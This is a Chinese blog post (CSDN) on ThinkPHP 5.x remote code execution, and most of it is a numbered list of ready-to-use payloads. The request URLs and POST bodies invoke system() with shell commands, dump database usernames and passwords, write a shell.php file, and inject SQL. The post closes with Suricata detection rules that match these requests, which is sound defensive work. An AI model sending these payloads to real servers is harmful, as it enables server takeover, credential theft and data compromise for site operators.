thinkphp 5.x全版本任意代码执行

最新推荐文章于 2023-02-28 12:00:01 发布

fate9091

最新推荐文章于 2023-02-28 12:00:01 发布

阅读量846

点赞数

分类专栏： WEB攻防类

本文链接：https://blog.csdn.net/yuanfengfengyuan/article/details/88846750

版权

WEB攻防类专栏收录该内容

10 篇文章 0 订阅

订阅专栏

MSG

ThinkPHP 5.x 版本中没有对路由中的控制器进行严格过滤，在存在admin、index模块、没有开启强制路由的条件下（默认不开启），导致可以注入恶意代码利用反射类调用命名空间其他任意内置类，从而被 GetShell。

POC

反斜杠解析成类造成命令执行


thinkphp 5.0.22
1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5
5、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

thinkphp 5.0.21
6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.1.*
8、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
9、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
10、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
11、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
12、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
13、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
14、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
15、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

未知版本
16、?s=index/\think\module/action/param1/${@phpinfo()}
17、?s=index/\think\Module/Action/Param/${@phpinfo()}
18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
19、index.php?s=/home/article/view_recent/name/1' 
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
20、index.php?s=/home/shopcart/getPricetotal/tag/1%27
21、index.php?s=/home/shopcart/getpriceNum/id/1%27
22、index.php?s=/home/user/cut/id/1%27
23、index.php?s=/home/service/index/id/1%27
24、index.php?s=/home/pay/chongzhi/orderid/1%27
25、index.php?s=/home/pay/index/orderid/1%27
26、index.php?s=/home/order/complete/id/1%27
27、index.php?s=/home/order/complete/id/1%27
28、index.php?s=/home/order/detail/id/1%27
29、index.php?s=/home/order/cancel/id/1%27
30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"
1') union select sleep('''+str(sleep_time)+''')#

thinkphp 5.0.23（完整版）debug模式
32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx

thinkphp 5.0.23(完整版)
33、（post）public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

thhinkphp 5.0.10（完整版）
34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system
            
<= 5.0.13
POST /?s=index/index
s=whoami&_method=__construct&method=&filter[]=system

<= 5.0.23、5.1.0 <= 5.1.16   – 开启debug()
POST /
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al

<= 5.0.23 需要captcha的method路由，如果存在其他method路由，也是可以将captcha换为其他。
POST /?s=captcha HTTP/1.1
_method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami&method=get

5.0.0 <= version <= 5.1.32  – error_reporting(0)关闭报错
POST /
c=exec&f=calc.exe&_method=filter

检测

通用型： get 请求
alert http any any -> any any (msg:"WAF.ThinkPHP.5.X.Remote_Code_Execution.Threat.A"; flow:established,to_server; content:"GET"; http_method;  nocase; pcre:"/\x3Fs=.+think\x5c/Ui"; reference:url,https://mp.csdn.net/mdeditor/88846750; classtype:web-application-attack; sid:80000009; rev:1; metadata:created_at 2019_03_25, updated_at 2019_03_25;) 
pcre:"/GET\x20[\S]*\?s=[\S]*think(%5c|\\)[\S\s]*HTTP\/\d\.\d\x20200/i"


alert http any any -> any any (msg:"WAF.ThinkPHP.5.X.Remote_Code_Execution.Threat.B"; flow:established,to_server; content:"POST"; http_method; nocase; pcre:"/_method=(__construct|filter)/Pi"; reference:url,https://mp.csdn.net/mdeditor/88846750; classtype:web-application-attack; sid:80000010; rev:1; metadata:created_at 2019_03_25, updated_at 2019_03_25;)
pcre:"/POST\x20[\s\S]*\x0d\x0a_method=(__construct|filter)[\S\s]*HTTP\/\d\.\d\x20200/i"

PCAP: https://github.com/Fate9091/fate/blob/master/thinkphp-5-x-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-%E5%AF%86%E7%A0%81pass.rar

参考

https://xz.aliyun.com/t/3570
https://www.exploit-db.com/exploits/46150

fate9091

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
thinkphp 5.x全版本任意代码执行

MSGThinkPHP 5.x 版本中没有对路由中的控制器进行严格过滤，在存在admin、index模块、没有开启强制路由的条件下（默认不开启），导致可以注入恶意代码利用反射类调用命名空间其他任意内置类，从而被 GetShell。POC反斜杠解析成类造成命令执行thinkphp 5.0.221、http://192.168.1.1/thinkphp/public/?s=.|think\...
复制链接

扫一扫